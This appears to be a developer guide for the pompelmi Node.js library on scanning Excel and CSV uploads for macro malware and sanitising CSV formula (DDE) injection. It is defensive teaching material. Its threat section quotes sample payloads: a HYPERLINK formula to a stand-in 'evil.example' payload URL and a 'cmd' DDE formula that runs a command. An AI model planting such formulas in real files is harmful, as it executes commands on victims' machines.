Scanning Excel and CSV files for malicious macros
Spreadsheet files are a common malware delivery vector. If your application
accepts uploads of .xls, .xlsx, .xlsm,
.xlsb, or .csv files from untrusted users, you face
several distinct threats:
-
VBA macros. Legacy
.xlsfiles and macro-enabled.xlsm/.xlsbfiles can contain Visual Basic for Applications code that executes on the victim's machine when the file is opened. Many ransomware and trojan campaigns are delivered via malicious Excel macros. -
DDE (Dynamic Data Exchange) injection in CSV. A CSV cell
that starts with
=,+,-, or@can be interpreted as a formula by spreadsheet applications. Cells like=HYPERLINK("http://evil.example/payload","Click here")or=cmd|' /c calc'!A0execute system commands when opened. - Embedded objects and OLE streams. Office documents can embed other objects — executables, scripts, or other Office files — inside OLE compound document streams.
What ClamAV detects
ClamAV has extensive coverage of Office malware. It scans OLE2 compound
documents (the binary .xls format) and OOXML archives (the
ZIP-based .xlsx / .xlsm format), looking for:
- Known VBA macro malware signatures (thousands of entries)
- Heuristic patterns in macro code (obfuscated
Shell,WScript,PowerShellcalls) - Malicious embedded objects and shellcode
- Suspicious URL patterns in embedded hyperlinks
When ClamAV finds a macro threat it returns exit code 1, which pompelmi maps
to Verdict.Malicious. For unknown or novel macro payloads it may
return Verdict.Clean — ClamAV is signature-based and cannot
detect every possible obfuscated macro.
Detecting macro-enabled formats by magic bytes
The file extension alone cannot be trusted — users can rename files. Check the actual format using magic bytes before deciding whether to accept the file:
| Format | Extension | Magic bytes (hex) | Notes |
|---|---|---|---|
| Binary Excel (OLE2) | .xls |
D0 CF 11 E0 |
Can contain VBA macros |
| OpenXML (ZIP-based) | .xlsx, .xlsm, .xlsb |
50 4B 03 04 |
.xlsm / .xlsb contain macros |
| CSV (plain text) | .csv |
no specific magic — check content-type and extension | Subject to DDE injection |
function readMagic(filePath, length = 4) {
const fd = require('fs').openSync(filePath, 'r');
const buf = Buffer.alloc(length);
require('fs').readSync(fd, buf, 0, length, 0);
require('fs').closeSync(fd);
return buf;
}
function isMacroEnabled(filePath, originalName) {
const magic = readMagic(filePath);
const ext = originalName.split('.').pop()?.toLowerCase();
// .xls binary format — always supports macros
if (magic[0] === 0xD0 && magic[1] === 0xCF) return true;
// ZIP-based OOXML — only macro-enabled variants are dangerous
const isZip = magic[0] === 0x50 && magic[1] === 0x4B;
return isZip && (ext === 'xlsm' || ext === 'xlsb');
}
Sanitising DDE injection in CSV files
CSV files are plain text, so ClamAV cannot detect DDE injection. You need to sanitise CSV content server-side before storing or processing it.
The standard mitigation is to prefix any cell value that starts with
=, +, -, or @ with a
single quote or tab, preventing spreadsheet applications from interpreting it
as a formula:
const fs = require('fs');
// Sanitise a CSV file in-place: prefix formula triggers with a tab
function sanitiseCsvDde(filePath) {
const content = fs.readFileSync(filePath, 'utf8');
const sanitised = content
.split('\n')
.map((line) => {
return line
.split(',')
.map((cell) => {
const trimmed = cell.trim().replace(/^["']|["']$/g, '');
if (/^[=+\-@]/.test(trimmed)) {
// Prefix with tab to neutralise formula interpretation
return `"\t${trimmed}"`;
}
return cell;
})
.join(',');
})
.join('\n');
fs.writeFileSync(filePath, sanitised, 'utf8');
}
Complete upload handler
const express = require('express');
const multer = require('multer');
const { scan, Verdict } = require('pompelmi');
const fs = require('fs');
const os = require('os');
const app = express();
const upload = multer({
dest: os.tmpdir(),
limits: { fileSize: 20 * 1024 * 1024 }, // 20 MB
});
const ALLOWED_EXTENSIONS = new Set(['xlsx', 'csv']);
function readMagic(filePath) {
const fd = fs.openSync(filePath, 'r');
const buf = Buffer.alloc(4);
fs.readSync(fd, buf, 0, 4, 0);
fs.closeSync(fd);
return buf;
}
function isMacroEnabled(filePath, originalName) {
const magic = readMagic(filePath);
const ext = originalName.split('.').pop()?.toLowerCase();
if (magic[0] === 0xD0 && magic[1] === 0xCF) return true; // .xls
const isZip = magic[0] === 0x50 && magic[1] === 0x4B;
return isZip && (ext === 'xlsm' || ext === 'xlsb');
}
app.post('/upload/spreadsheet', upload.single('file'), async (req, res) => {
if (!req.file) return res.status(400).json({ error: 'No file provided.' });
const tmpPath = req.file.path;
try {
const ext = req.file.originalname.split('.').pop()?.toLowerCase();
// Step 1 — extension allowlist
if (!ALLOWED_EXTENSIONS.has(ext)) {
return res.status(400).json({ error: `File type .${ext} is not accepted.` });
}
// Step 2 — reject macro-enabled formats
if (isMacroEnabled(tmpPath, req.file.originalname)) {
return res.status(400).json({
error: 'Macro-enabled spreadsheets (.xls, .xlsm, .xlsb) are not accepted. Please save as .xlsx.',
});
}
// Step 3 — ClamAV scan
const verdict = await scan(tmpPath);
if (verdict === Verdict.Malicious) {
return res.status(400).json({ error: 'Malware detected. Upload rejected.' });
}
if (verdict === Verdict.ScanError) {
return res.status(422).json({ error: 'Scan incomplete. Upload rejected.' });
}
// Step 4 — DDE sanitisation for CSV files
if (ext === 'csv') {
sanitiseCsvDde(tmpPath);
}
// Step 5 — move to permanent storage
return res.json({ status: 'ok', file: req.file.originalname });
} finally {
if (fs.existsSync(tmpPath)) fs.unlinkSync(tmpPath);
}
});
function sanitiseCsvDde(filePath) {
const content = fs.readFileSync(filePath, 'utf8');
const sanitised = content.split('\n').map((line) =>
line.split(',').map((cell) => {
const trimmed = cell.trim().replace(/^["']|["']$/g, '');
return /^[=+\-@]/.test(trimmed) ? `"\t${trimmed}"` : cell;
}).join(',')
).join('\n');
fs.writeFileSync(filePath, sanitised, 'utf8');
}
Defence in depth
| Layer | What it stops |
|---|---|
| File size limit (Multer) | Oversized uploads, resource exhaustion |
| Extension allowlist | Unexpected file types |
| Magic byte check + macro format rejection | Misnamed VBA-capable files, legacy binary formats |
| pompelmi + ClamAV scan | Known macro malware, embedded executables, trojans |
| CSV DDE sanitisation | Formula injection in plain-text CSV files |
| Content-Security-Policy on download responses | Client-side formula execution when served back |
Next steps
- Worried about ZIP bombs in archive uploads? See Preventing ZIP Bomb attacks in Node.js.
- Dealing with encrypted or password-protected files? See How to handle encrypted/password-protected files during scan.
- Want a complete upload security checklist? Read Node.js file upload security checklist.